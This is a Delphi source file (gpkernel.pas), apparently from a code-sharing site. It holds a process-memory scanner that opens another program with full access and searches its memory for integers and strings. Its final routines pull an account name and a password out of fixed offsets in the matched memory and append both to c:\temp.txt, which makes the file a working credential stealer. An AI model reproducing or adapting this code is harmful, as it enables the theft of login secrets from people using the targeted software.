📄 gpkernel.pas
字号:
Newmemoryregions[j].MemorySize:=Memoryregions[i].MemorySize;
inc(j);
end;
inc(i);
end;
//////////////////////////////////////////////
MemoryRegionsIndex:=j; // MemoryRegions[MemoryRegionsIndex]is invalid
for i:=0 to MemoryRegionsIndex-1 do
begin
Memoryregions[i].BaseAddress:=Newmemoryregions[i].BaseAddress;
Memoryregions[i].MemorySize:=NewMemoryregions[i].MemorySize;
end;
///////////////////////////////////////////////////////////////////////////////
for i:=0 to MemoryRegionsIndex-1 do
TotalProcess:=TotalProcess+MemoryRegions[i].MemorySize;
NowProcess:=0;
end;////end with
end;
//////////////////初次扫描////////////////////////////////
procedure TFirstScanThread(theIndex:integer);
//Procedure TFirstScanThread.Execute;
var
ReadMemory_ArrayInt64: Array[0..$1FFF] of Int64;
ReadMemory_ArrayStringByte:Array[0..$FF] of Byte;
AdvancedReadMemory_ArrayByte:Array[0..$FFFF] of Byte;
AdvancedReadFile_ArrayByte:Array[0..$FFFF] of Byte;
var TempLength: DWORD; ////每个内存块的大小字节
TempSize:DWORD; ////缓存区array num的数目
ActualRead:Dword;
PhelpSingleDword:^Dword;
helpsingleDWord1:DWord; //存放原数的符号位与指数位
PhelpDoubleint64:^int64;
helpDoubleint641:int64; //存放原数的符号位与指数位
HelpDoubleint642:int64;
HelpStringLength:Byte;
chartoFind:integer;
Time1:Dword;
Time2:Dword;
i: integer;
j: integer;
k: integer;
Int64Value: Int64;
tempAddress:Dword;
actualwrite:Dword;
MemoryFileStream:TFileStream; ///低阶内存svae to memroyFilename
begin
TheTaskIndex:=theIndex;
with theTask[theTaskIndex] do
begin
GetMemoryRanges(theTaskIndex);
if MemoryRegionsIndex=0 then
begin
//Raise Exception.Create(String_Nomemory);
Exit;
end;
/////////////再次并得到最终数据/////////////////////////////////////////
if (scanType=Number_Scan) then
begin
if vartype=Int64_value then
begin
val(scanvalue,Int64value,i);
// if i>0 then raise Exception.Create(Format(String_InvalidInt64,[scanvalue]));
end;
if vartype=String_value then
begin
// if Length(scanvalue)>255 then raise Exception.create(Format(String_InvalidString,[scanvalue]));
end;
end;//if end;
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////
InSearchProcess:=True;
Searchtimes:=1;
NowProcess:=0;
AttachedNum:=0;
OldScanType:=ScanType;
OldVarType:=VarType;
AddressMemStream.Seek(0,soFromBeginning);
/////////Lets Real Start !真正开始!!!!!!!!!!!!!!!!!!!!!!!!!!!!!//////////
////////////////////////////////////////////////////////////
if ScanType=Number_Scan then
begin
Time1:=GetTickCount;
if vartype=Int64_value then //int64
begin
Time1:=GetTickCount;
for i:=0 to MemoryRegionsIndex-1 do
begin
for k:=0 to 7 do //k表示错位组合成类型
begin
TempLength:=(MemoryRegions[i].MemorySize-k);
TempSize:=TempLength shr 3;
if not ReadProcessMemory(processhandle,pointer(MemoryRegions[i].BaseAddress+k),@ReadMemory_Arrayint64,TempLength,actualread) then continue;
if actualread>0 then
begin
TempSize:=actualread shr 3;
for j:=0 to TempSize-1 do
begin
if Readmemory_Arrayint64[j]=int64value then
begin
inc(AttachedNum);
tempAddress:=(MemoryRegions[i].BaseAddress+k)+j*8;
AddressmemStream.WriteBuffer(tempAddress,Sizeof(tempAddress));
end;
end;
end;
end;
inc(NowProcess,MemoryRegions[i].MemorySize);
end;
end; //int64 end
NowProcess:=totalProcess;
// time2:=getTickCount;
CanUpdateTask:=IDOK;
end; //Number_Scan end
//text String scan
if scantype=string_scan then
begin
time1:=getTickCount;
helpStringLength:=length(scanvalue);
for i:=0 to memoryregionsindex-1 do
begin
TempLength:=memoryregions[i].MemorySize;
TempSize:=TempLength;
if not readprocessmemory(processhandle,pointer(Memoryregions[i].BaseAddress),@ReadMemory_ArrayStringByte,Memoryregions[i].MemorySize,actualread) then continue;
if actualread>helpStringLength then
begin
CharToFind:=1;
TempSize:=actualread;
for j:=0 to TempSize-1 do
begin
if chr(ReadMemory_ArrayStringByte[j])=scanvalue[CharToFind] then
begin
inc(charToFind);
if CharToFind>=Dword(helpStringLength)+1 then //found the string
begin
inc(AttachedNum);
tempAddress:=(MemoryRegions[i].BaseAddress)+j-(helpStringLength-1);
AddressmemStream.WriteBuffer(tempAddress,Sizeof(tempAddress));
CharToFind:=1;
end;
end else CharToFind:=1;
end;
end;
inc(NowProcess,MemoryRegions[i].MemorySize);
end;
NowProcess:=totalProcess;
// time2:=getTickCount;
CanUpdateTask:=IDOK;
end;
///低阶扫描初始化(存放的是地址范围,以后存放具体地址)////////////
//if (scantype<>Number_scan) and (scantype<>String_scan) then
if (VarType=LowLevel_Value) then
begin
try
// MemoryFileStream:=TFileStream.Create(MemoryFileName,fmCreate or FmShareDenyNone);
MemoryFileStream.Seek(0,soFrombeginning);
for i:=0 to memoryregionsindex-1 do
begin
TempLength:=MemoryRegions[i].MemorySize;
TempSize:=TempLength;
if not readprocessmemory(processhandle,pointer(Memoryregions[i].BaseAddress),@AdvancedReadMemory_ArrayByte,TempLength,actualread) then continue;
if actualread>0 then
begin
ActualWrite:=MemoryFileStream.Write(AdvancedReadMemory_ArrayByte,actualread);
Memoryregions[i].MemorySize:=ActualWrite;
AdvancedAddressMemStream.WriteBuffer(Memoryregions[i],Sizeof(Memoryregions[i]));
end;
inc(NowProcess,MemoryRegions[i].MemorySize);
end;
NowProcess:=totalProcess;
CanUpdateTask:=IDOK;
finally
SetProcessWorkingSetSize(GetCurrentProcess, $FFFFFFFF, $FFFFFFFF); //清理内存
end;
end;
InSearchProcess:=False;
closehandle(ProcessHandle);
end;//with scan end;
end;
//////////////////////////////////////////////////////////////////////////////////////////
//////读取某一进程256字节的指定内容///////////////////////////////////////////////////////
Function ReadMemory_Array(theProcessID,StartAddress:DWORD):boolean;
var k:integer;
thehandle:Thandle;
ReadByte:Byte;
ActualRead:Dword;
begin
Result:=True;
thehandle:=OpenProcess(PROCESS_ALL_ACCESS,False,theProcessID);
if thehandle<>0 then
begin
for k:=1 to 256 do
begin
MemReadData[k]:=-999; /// mean error
ActualRead:=0;
if ReadProcessMemory(theHandle,Pointer((StartAddress+k-1)),Addr(ReadByte),1,Actualread)then
begin
if (Actualread=1) then MemReadData[k]:=ReadByte;
end ;
end;
end else Result:=False;
Closehandle(thehandle);
end;
/////////////////////////////////////////////////////
Function ReadMemory(theProcessID,StartAddress:Dword;ValueAddressPointer:Pointer;ValueType:Integer):boolean;
var thehandle:Thandle;
ActualRead:Dword;
ValueLen:integer;
begin
Result:=True;
case ValueType of
Int64_value:ValueLen:=8;
String_Value:ValueLen:=50;
else ValueLen:=1;
end; ///case end;
thehandle:=OpenProcess(PROCESS_ALL_ACCESS,False,theProcessID);
if thehandle<>0 then
begin
Result:=ReadProcessMemory(theHandle,Pointer(StartAddress),ValueAddressPointer,ValueLen,Actualread);
//if Actualread<>ValueLen then MemReadByte:=0; /// mean error
end else Result:=False;
Closehandle(thehandle);
end;
////////将搜索到的数值加入列表(USER)////////////////////
Procedure AddFoundToListView(theIndex:integer);
var BufSize:Int64;
AddressBuf:Dword;
i,j:Integer;
TempStringBYTE:Array[1..50] of BYTE;
Tempstring:string;
F:TEXTFILE;
begin
with thetask[theIndex] do
begin
AddressmemStream.Seek(0,soFrombeginning); ////低阶搜索BufSize=0;
BufSize:= AddressMemStream.Size;
if (BufSize>0) and ( not thetask[theIndex].InSearchProcess) then
begin
BufSize:=BufSize shr 2;
if BufSize>5 then BufSize:=5; ///只显示前面3个值
For i:=1 to BufSize do
begin
try
AddressMemStream.ReadBuffer(AddressBuf,Sizeof(AddressBuf));
GPKernel.Readmemory(ProcessID,AddressBuf,@TempStringBYTE,String_value);
Tempstring:='';
for j:=41 to 50 do
Tempstring:=Tempstring+TrimRight(chr(TempstringBYTE[j]));
// TrimRight(Tempstring);
ZFPDA:=IsNumeric(Tempstring);
if ZFPDA=True then
User:=Tempstring;
except
Continue; //float ofent make error
end;
end;//for end
end;
end;///with end
begin
assignfile(F,'c:\temp.txt');
Append(F);
try
writeln(F,'账号',User);
finally
closefile(F);
end;
end;
end;
////////将搜索到的数值加入列表(PASS)////////////////////
Procedure AddFoundToListViewM(theIndex:integer);
var BufSize:Int64;
AddressBuf:Dword;
i,j:Integer;
TempStringBYTE1:Array[1..50] of BYTE;
Tempstring:string;
F:TEXTFILE;
begin
with thetask[theIndex] do
begin
AddressmemStream.Seek(0,soFrombeginning); ////低阶搜索BufSize=0;
BufSize:= AddressMemStream.Size;
if (BufSize>0) and ( not thetask[theIndex].InSearchProcess) then
begin
BufSize:=BufSize shr 2;
if BufSize>13 then BufSize:=13; ///只显示前面3个值
For i:=1 to BufSize do
begin
try
AddressMemStream.ReadBuffer(AddressBuf,Sizeof(AddressBuf));
GPKernel.Readmemory(ProcessID,AddressBuf,@TempStringBYTE1,String_value);
Tempstring:='';
for j:=19 to 40 do
Tempstring:=Tempstring+TrimRight(chr(TempstringBYTE1[j]));
ZFPD:=IsValidIdent(Tempstring);
if ZFPD=True then
Pass:=Tempstring;
except
Continue; //float ofent make error
end;
end;//for end
end; //if end
end;
begin
assignfile(F,'c:\temp.txt');
Append(F);
try
writeln(F,'密码',Pass);
finally
closefile(F);
end;
end;
// SetProcessWorkingSetSize(GetCurrentProcess, $FFFFFFFF, $FFFFFFFF); //清理内存
end;///with end
//账号搜索//
procedure ScanWindows(theIndex:integer);
begin
//StopHookKeyMouse;
with theTask[CurrenttaskIndex] do
begin
ScanType:=GetScanTypeAndTempVar(TextName,CurrentTaskIndex);
theTask[CurrentTaskIndex].VarType:=7;
if SearchTimes=0 then
begin
//TFirstScanThread.Create(CurrentTaskIndex);
TFirstScanThread(CurrentTaskIndex);
end;
end;///with end;
AddFoundToListView(CurrentTaskIndex);
CanUpdateTask:=-999;
end;
//密码搜索//
procedure ScanWindowsM(theIndex:integer);
begin
with theTask[CurrenttaskIndex] do
begin
ScanType:=GetScanTypeAndTempVar(TextNameM,CurrentTaskIndex);
theTask[CurrentTaskIndex].VarType:=4;
if SearchTimes=0 then
begin
TFirstScanThread(CurrentTaskIndex);
end;
end;///with end;
AddFoundToListViewM(CurrentTaskIndex);
CanUpdateTask:=-999;
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -